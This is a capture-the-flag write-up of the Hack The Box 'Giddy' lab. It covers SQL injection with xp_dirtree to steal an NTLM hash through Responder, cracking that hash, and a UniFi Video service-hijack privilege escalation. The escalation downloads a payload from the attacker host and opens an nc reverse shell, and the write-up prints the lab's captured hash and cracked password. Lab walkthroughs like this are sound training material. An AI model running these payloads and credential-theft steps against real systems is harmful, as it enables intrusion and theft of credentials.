htb-giddy-nl

Today we are going to solve another CTF challenge “Giddy”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Expert

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore they have a static IP. The IP of Giddy is 10.10.10.104

As always we will start with nmap to scan for open ports and services :

root@kali:~/htb/giddy# nmap -sV -sT -sC 10.10.10.104
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-27 12:24 CET
Nmap scan report for 10.10.10.104
Host is up (0.029s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods: 
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
443/tcp open ssl/http Microsoft IIS httpd 10.0
| http-methods: 
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| ssl-cert: Subject: commonName=PowerShellWebAccessTestWebSite
| Not valid before: 2018-06-16T21:28:55
|_Not valid after: 2018-09-14T21:28:55
|_ssl-date: 2019-02-27T11:25:03+00:00; 0s from scanner time.
| tls-alpn: 
| h2
|_ http/1.1
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Giddy
| Not valid before: 2019-02-23T22:16:52
|_Not valid after: 2019-08-25T22:16:52
|_ssl-date: 2019-02-27T11:25:03+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.30 seconds

On http (port 80) there’s only this picture :

Also the same picture on https (port 443)

Let’s run wfuzz

c:\PENTEST>wfuzz -c -z file,directory-list-2.3-medium.txt --hc=404 http://10.10.10.104/FUZZ
********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.104/FUZZ
Total requests: 220551

==================================================================
ID Response Lines Word Chars Payload
==================================================================

000002: C=200 31 L 55 W 700 Ch "#"
000001: C=200 31 L 55 W 700 Ch "# directory-list-2.3-medium.txt"
000003: C=200 31 L 55 W 700 Ch "# Copyright 2007 James Fisher"
000004: C=200 31 L 55 W 700 Ch "#"
000005: C=200 31 L 55 W 700 Ch ""
002307: C=302 3 L 8 W 157 Ch "remote"
006995: C=400 80 L 276 W 3420 Ch "*checkout*"
015454: C=400 80 L 276 W 3420 Ch "*docroot*"
015778: C=301 1 L 10 W 147 Ch "mvc"
016404: C=400 80 L 276 W 3420 Ch "*"
022962: C=400 80 L 276 W 3420 Ch "http%3A%2F%2Fwww"
031858: C=400 80 L 276 W 3420 Ch "http%3A"
035269: C=400 80 L 276 W 3420 Ch "q%26a"
035650: C=400 80 L 276 W 3420 Ch "**http%3a"
039198: C=400 80 L 276 W 3420 Ch "*http%3A"
045231: C=200 31 L 55 W 700 Ch ""
055398: C=400 80 L 276 W 3420 Ch "**http%3A"
055688: C=400 80 L 276 W 3420 Ch "http%3A%2F%2Fyoutube"
063474: C=404 29 L 95 W 1245 Ch "rss_promo"
Finishing pending requests...

Let’s take a look at /remote :

It redirects us to this page titled as Windows PowerShell Web Access , we don’t have any credentials so we can ignore this for now and check /mvc

And we get this ASP.NET application


SQLI and getting User

After some regular enumeration we will find that when we click on a product name we get something like this :

The url has a parameter called ProductSubCategoryId , and if we try a single quote ' :

We get an error saying “Unclosed quotation mark after the character string” so this parameter is sql injectable , let’s try something like 1; UPDATE Product SET Name= ''

And we see that it dumped the products, we can run responder and use xpdirtreeto make it try to connect to us , you can read about xpdirtree here

To do this let’s run responder first responder -I tun0

Then let’s use xpdirtree : 1; EXEC MASTER.sys.xp_dirtree '\\10.10.xx.xx\fakeshare'

What is this doing is simply running a fake smb server with responder that steals ntlm hashes , then by using xpdirtree we make the server try to connect to our fake smb server. Let’s check responder now :

root@kali:~/htb/giddy# responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 2.3.3.9

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CRTL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    DNS/MDNS                   [ON]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Fingerprint hosts          [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.20]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Listening for events...
[SMBv2] NTLMv2-SSP Client : 10.10.10.104
[SMBv2] NTLMv2-SSP Username : GIDDY\Stacy
[SMBv2] NTLMv2-SSP Hash : Stacy::GIDDY:72fe267ac292121b:6744A5C663ED890D026D026BECE2B31B:0101000000000000C0653150DE09D201C94925EC226E4117000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D201060004000200000008003000300000000000000000000000003000006685072246E39F2F27E3BF3B79A87F7D3EF09383F6DE7E145476F2934DBB8F430A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0032003000000000000000000000000000
[*] Skipping previously captured hash for GIDDY\Stacy
[*] Skipping previously captured hash for GIDDY\Stacy
[*] Skipping previously captured hash for GIDDY\Stacy

We captured ntlm hash for a user called Stacy , Let’s crack the hash with john

root@kali:~/htb/giddy# john --wordlist=/usr/share/wordlists/rockyou.txt stacy.hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
xNnWo6272k7x (Stacy)
1g 0:00:00:08 DONE (2019-02-27 12:14) 0.1177g/s 316692p/s 316692c/s 316692C/s xNnWo6272k7x
Use the "--show" option to display all of the cracked passwords reliably
Session completed

And the password is xNnWo6272k7x , let’s use the PowerShell Web Access

We get his web interface for powershell :

We can get the user flag now :

PS C:\Users\Stacy\Documents> 
cd ../Desktop
PS C:\Users\Stacy\Desktop> 
type user.txt
10C*****0AD

unifivideo local privilege escalation

If we return to Documents again we will find a file called unifivideo

UniFi Video is a powerful and flexible, integrated IP video management surveillance system designed to work with Ubiquiti’s UniFi Video Camera product line. UniFi Video has an intuitive, configurable, and feature‑packed user interface with advanced features such as motion detection, auto‑discovery, user-level security, storage management, reporting, and mobile device support.

A quick google search and we will find that an old version of unifivideo had a local privilege escalation vulnerability , check it here

What’s happening is , Upon the start of the service “Ubiquiti UniFi Video” it tries to execute a file called taskkill.exe in C:\ProgramData\unifi-video\ but that file doesn’t exist by default , if we have write permissions to that directory we can place our payload there as taskkill.exe then restart the service. And because the service runs with privileged permissions , it will be executed as administrator.

PS C:\ProgramData\unifi-video>
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services | where Name -Match 'uni'
Hive: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services

Name Property
---- --------
UniFiVideoService Type : 16
Start : 2
ErrorControl : 1
ImagePath : C:\ProgramData\unifi-video\avService.exe //RS//UniFiVideoService
DisplayName : Ubiquiti UniFi Video
DependOnService : {Tcpip, Afd}
ObjectName : LocalSystem
Description : Ubiquiti UniFi Video Service
PS C:\ProgramData\unifi-video> 

.\taskkill.exe

Program 'taskkill.exe' failed to run: This program is blocked by group policy. For more information, contact your system administrator.

    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException 

    + FullyQualifiedErrorId : NativeCommandFailed
PS C:\ProgramData\unifi-video> Get-AppLockerPolicy -Local

Version RuleCollections

------- ---------------

1 {Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.FilePublisherRule, Microsoft.Security.Applica...

Let’s first create a payload with C# :

c:\PENTEST>c:\windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:exe /out:taskkill.exe taskkill.cs
Microsoft (R) Visual C# Compiler version 4.7.3056.0
for C# 5
Copyright (C) Microsoft Corporation. All rights reserved.

This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240

taskkill.cs(64,34): warning CS0168: The variable 'err' is declared but never used

Then we will run a simple http server with python to host the payload

c:\PENTEST\python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.104 - - [27/Feb/2019 17:45:50] "GET /taskkill.exe HTTP/1.1" 200 -

After that we will download the file , since we are on powershell we can do this :

Invoke-WebRequest -o taskkill.exe http://10.10.xx.xx/taskkill.exe

Then we will stop the service :

Stop-Service "Ubiquiti UniFi Video" 

Start it again :

Start-Service "Ubiquiti UniFi Video" 


.
c:\Users\jacco>nc -lvp 443
listening on [any] 443 ...
10.10.10.104: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.104] 49782: NO_DATA
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\ProgramData\unifi-video>
whoami
C:\ProgramData\unifi-video>whoami
nt authority\system
C:\ProgramData\unifi-video>cd c:\Users\administrator\desktop
c:\Users\Administrator\Desktop>dir
Volume in drive C is Windows 2016
Volume Serial Number is 0828-8CAE
Directory of c:\Users\Administrator\Desktop
06/17/2018 09:53 AM <DIR> .
06/17/2018 09:53 AM <DIR> ..
06/17/2018 09:53 AM 32 root.txt
06/16/2018 08:54 PM 842 Ubiquiti UniFi Video.lnk
2 File(s) 874 bytes
2 Dir(s) 42,888,380,416 bytes free
type root.txt
c:\Users\Administrator\Desktop>type root.txt
CF5*****1B1
Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *